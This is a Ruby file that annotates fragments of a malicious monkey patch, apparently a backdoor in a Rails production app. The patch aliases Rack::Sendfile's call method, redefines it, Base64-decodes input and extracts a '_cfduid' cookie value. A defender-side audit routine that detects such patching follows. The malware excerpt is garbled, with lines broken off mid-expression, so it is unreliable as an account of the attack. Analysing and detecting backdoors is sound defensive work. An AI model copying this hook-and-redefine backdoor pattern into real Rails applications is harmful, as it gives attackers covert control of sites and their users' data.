```ruby
production? # Continue only if we're in the rails production environment:
Rack::Sendfile.
# the block parameter, r, will be the Rack::Sendfile class.
# So whenever you see r, just think we are working with the Rack::Sendfile class.
send :alias_method, :c, :call # creates a method on Rack::Sendfile called `c` which reroutes to `call`.
# After the above you could now do:
# send_file = Rack::Sendfile.new
# send_file.c
# and the above would in turn call the ORIGINAL `call` method contained in the
# Rack::Sendfile class, and not the one that is being monkey patched below.
# `r.send` makes use of the `Object#send` method
# Another way of rewriting the above code would be:
# `Rack::Sendfile.alias_method(:c, :call)` which is equivalent to:
# `r.send :alias_method, :c, :call`
# The following bit of code redefines the call(e) method which is in
# the Sendfile class:
# again, `r.send(:define_method, :call) do |e|` is equivalent to saying:
# class Rack::Sendfile
#   def call(e)
#     => Insert the malicious code below:
#   end
# end
r.send(:define_method, :call) do |e|
begin
x = Base64.
to_s) # Please edit this if you are more knowledgeable:
# gets the e value out of there.
# then it scans/looks for this value: _cfduid and extracts it with
# a regular expression.
```
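As an added example (not code from the original post or from Rack), here is a defender-side check for the alias-then-redefine pattern the comments describe: snapshot where a class's methods are defined, then report added aliases and redefinitions. `FakeSendfile`, `snapshot`, `audit` and `apply_wrapper` are hypothetical names, and `FakeSendfile` is a constructed stand-in for `Rack::Sendfile` so the block runs without the rack gem.

```ruby
# Constructed stand-in for Rack::Sendfile (assumption: same #call(env) shape).
class FakeSendfile
  def call(env)
    [200, {}, ["ok"]]
  end
end

# Record where each public instance method is defined, before other code loads.
def snapshot(klass)
  klass.public_instance_methods(false).to_h do |name|
    [name, klass.instance_method(name).source_location]
  end
end

# Compare the class against the snapshot and describe every difference.
def audit(klass, baseline)
  findings = []
  klass.public_instance_methods(false).each do |name|
    m = klass.instance_method(name)
    if !baseline.key?(name)
      # original_name exposes the method an alias points back to.
      note = m.original_name == name ? "added" : "added as alias of #{m.original_name}"
      findings << "#{name}: #{note}"
    elsif baseline[name] != m.source_location
      findings << "#{name}: redefined at #{m.source_location.join(':')}"
    end
  end
  findings.sort
end

BASELINE = snapshot(FakeSendfile)

# Same alias + define_method shape as in the comments, with a harmless body
# that only delegates to the original method.
def apply_wrapper(klass)
  klass.send :alias_method, :c, :call
  klass.send(:define_method, :call) { |e| c(e) }
end
```

Calling `audit(FakeSendfile, BASELINE)` after `apply_wrapper(FakeSendfile)` reports both the new alias `c` and the moved definition of `call`.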